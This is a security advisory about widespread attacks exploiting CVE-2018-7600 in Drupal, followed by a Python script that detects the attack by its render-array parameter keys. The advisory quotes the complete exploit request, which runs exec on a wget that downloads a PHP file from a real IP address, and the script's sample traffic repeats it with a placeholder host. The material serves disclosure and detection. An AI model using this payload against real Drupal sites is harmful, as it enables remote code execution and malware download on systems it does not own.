Widespread Drupal Arbitrary Code Execution

Date of Detection:

2018.3.29

Attack Pattern:

  • URI:

/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax

  • Request Body:

form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php

Target System:

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code.

Analysis:

This issue is not a zero-day vulnerability; it is assigned CVE-2018-7600. Nevertheless, attackers are scanning and attacking a large portion of CloudCoffer's worldwide honeypots, so any system that has not been updated is at risk.

Please note that the payload carried in the request body differs from request to request.
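Because the command in the payload varies between requests, matching on the downloaded file or the command string is unreliable. The stable part of the pattern above is structural: the client submits Drupal render-array keys (`#post_render`, `#type`, `#markup`, and `#value` inside `element_parents`) that a legitimate form never sends. The script below, an added example that is not part of the CloudCoffer report, decodes the query string and request body and flags any request whose parameter names or `element_parents` value contain a `#`-prefixed key. The sample requests are constructed for this example; the download host is a placeholder, not the address from the report.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# A '#'-prefixed key at the start of a parameter name or inside a bracket
# (e.g. mail[#post_render][]) is a render-array property, which browsers
# never submit for a normal Drupal form.
RENDER_KEY_RE = re.compile(r"(?:^|\[)#[A-Za-z_]+")

# Constructed sample traffic: (method, URI, body). The first entry mirrors the
# attack pattern in the report with a placeholder host; the others are benign.
SAMPLE_REQUESTS = [
    ("POST",
     "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax",
     "form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec"
     "&mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2FEXAMPLE_HOST%2Fdrupal.php"),
    ("POST", "/user/register",
     "form_id=user_register_form&name=alice&mail=alice%40example.org"),
    ("GET", "/user/register?ajax_form=1&_wrapper_format=drupal_ajax", ""),
]


def extract_params(uri, body):
    """Return decoded (key, value) pairs from the query string, then the body."""
    pairs = parse_qsl(urlsplit(uri).query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    return pairs


def suspicious_keys(uri, body=""):
    """List the decoded parameters that smuggle render-array keys.

    Parameter names are checked with RENDER_KEY_RE; the element_parents value
    is checked separately because there the key appears as a path component
    (account/mail/#value) rather than in bracket notation.
    """
    hits = []
    for key, value in extract_params(uri, body):
        if RENDER_KEY_RE.search(key):
            hits.append(key)
        if key == "element_parents" and "#" in value:
            hits.append(f"{key}={value}")
    return hits


def scan(requests):
    """Return one finding per request that carries render-array keys."""
    findings = []
    for method, uri, body in requests:
        hits = suspicious_keys(uri, body)
        if hits:
            findings.append({"method": method,
                             "path": urlsplit(uri).path,
                             "keys": hits})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(f"{finding['method']} {finding['path']}: {', '.join(finding['keys'])}")
```

Because the rule keys on parameter structure rather than on the command, it also catches variants that replace `exec` or the `wget` string, which is the behaviour the note above warns about. Requests from a patched Drupal front end are unaffected, since the fix in the patched versions discards these keys from input before the form is processed.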